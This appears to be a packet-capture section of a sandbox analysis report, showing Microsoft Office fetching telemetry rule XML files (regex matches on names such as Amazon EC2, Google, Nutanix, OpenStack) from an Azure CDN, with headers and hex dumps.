                  2024-10-23 04:48:10 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                  Session IDSource IPSource PortDestination IPDestination Port
                  53192.168.2.44979713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:10 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:10 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:10 GMT
                  Content-Type: text/xml
                  Content-Length: 425
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                  ETag: "0x8DC582BBA25094F"
                  x-ms-request-id: d9c1e6f5-d01e-00ad-385d-23e942000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044810Z-r197bdfb6b4lbgfqheuaxfm7xn0000000f3000000000fnyf
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:10 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                  Session IDSource IPSource PortDestination IPDestination Port
                  54192.168.2.44980313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:11 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:11 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:11 GMT
                  Content-Type: text/xml
                  Content-Length: 415
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                  ETag: "0x8DC582BA80D96A1"
                  x-ms-request-id: 250cc9c1-301e-000c-4ec3-20323f000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044811Z-16849878b78gvgmlcfru6nuc5400000005rg0000000055t3
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:11 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                  Session IDSource IPSource PortDestination IPDestination Port
                  55192.168.2.44980213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:11 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:11 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:11 GMT
                  Content-Type: text/xml
                  Content-Length: 479
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                  ETag: "0x8DC582B989EE75B"
                  x-ms-request-id: 71d2c1fc-001e-00a2-01de-21d4d5000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044811Z-16849878b782h9tt5z2wa5rfxg00000005t00000000011nh
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:11 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  56192.168.2.44980513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:11 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:11 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:11 GMT
                  Content-Type: text/xml
                  Content-Length: 419
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                  ETag: "0x8DC582B9C710B28"
                  x-ms-request-id: 07aa16c4-201e-0033-7ef4-24b167000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044811Z-r197bdfb6b4qpk6v9629ad4b5s0000000a6g00000000p873
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                  Session IDSource IPSource PortDestination IPDestination Port
                  57192.168.2.44980413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:11 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:11 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:11 GMT
                  Content-Type: text/xml
                  Content-Length: 471
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                  ETag: "0x8DC582B97E6FCDD"
                  x-ms-request-id: 700672c4-201e-0096-3cf2-24ace6000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044811Z-r197bdfb6b429k2s6br3k49qn400000002w0000000007gu3
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:11 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  58192.168.2.44980613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:11 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:11 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:11 GMT
                  Content-Type: text/xml
                  Content-Length: 477
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                  ETag: "0x8DC582BA54DCC28"
                  x-ms-request-id: 531fb3e5-001e-00a2-2356-23d4d5000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044811Z-r197bdfb6b4kq4j5t834fh90qn00000008mg00000000nskr
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:11 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  59192.168.2.44980913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:12 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:12 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:12 GMT
                  Content-Type: text/xml
                  Content-Length: 419
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                  ETag: "0x8DC582B9FF95F80"
                  x-ms-request-id: 14f65908-801e-008f-32d6-202c5d000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044812Z-16849878b78s2lqfdex4tmpp7800000005u0000000003tgu
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                  Session IDSource IPSource PortDestination IPDestination Port
                  60192.168.2.44980813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:12 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:12 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:12 GMT
                  Content-Type: text/xml
                  Content-Length: 477
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                  ETag: "0x8DC582BA48B5BDD"
                  x-ms-request-id: 7fcc546d-701e-001e-80a3-21f5e6000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044812Z-16849878b78gvgmlcfru6nuc5400000005n000000000gcru
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  61192.168.2.44980713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:12 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:12 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:12 GMT
                  Content-Type: text/xml
                  Content-Length: 419
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                  ETag: "0x8DC582BB7F164C3"
                  x-ms-request-id: 40a513cc-e01e-0051-0ef3-2484b2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044812Z-r197bdfb6b4h2vctng0a0nubg800000008r000000000h1p5
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                  Session IDSource IPSource PortDestination IPDestination Port
                  62192.168.2.44981113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:12 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:12 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:12 GMT
                  Content-Type: text/xml
                  Content-Length: 468
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                  ETag: "0x8DC582BB3EAF226"
                  x-ms-request-id: 09cb71da-201e-0033-6911-22b167000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044812Z-16849878b786wvrz321uz1cknn00000005v00000000017f5
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:12 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                  Session IDSource IPSource PortDestination IPDestination Port
                  63192.168.2.44981013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:12 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:12 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:12 GMT
                  Content-Type: text/xml
                  Content-Length: 472
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                  ETag: "0x8DC582BB650C2EC"
                  x-ms-request-id: 3892b43a-301e-0051-71f4-2438bb000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044812Z-15b8d89586f6nn8zquf2vw6t5400000002ug00000000e3xn
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
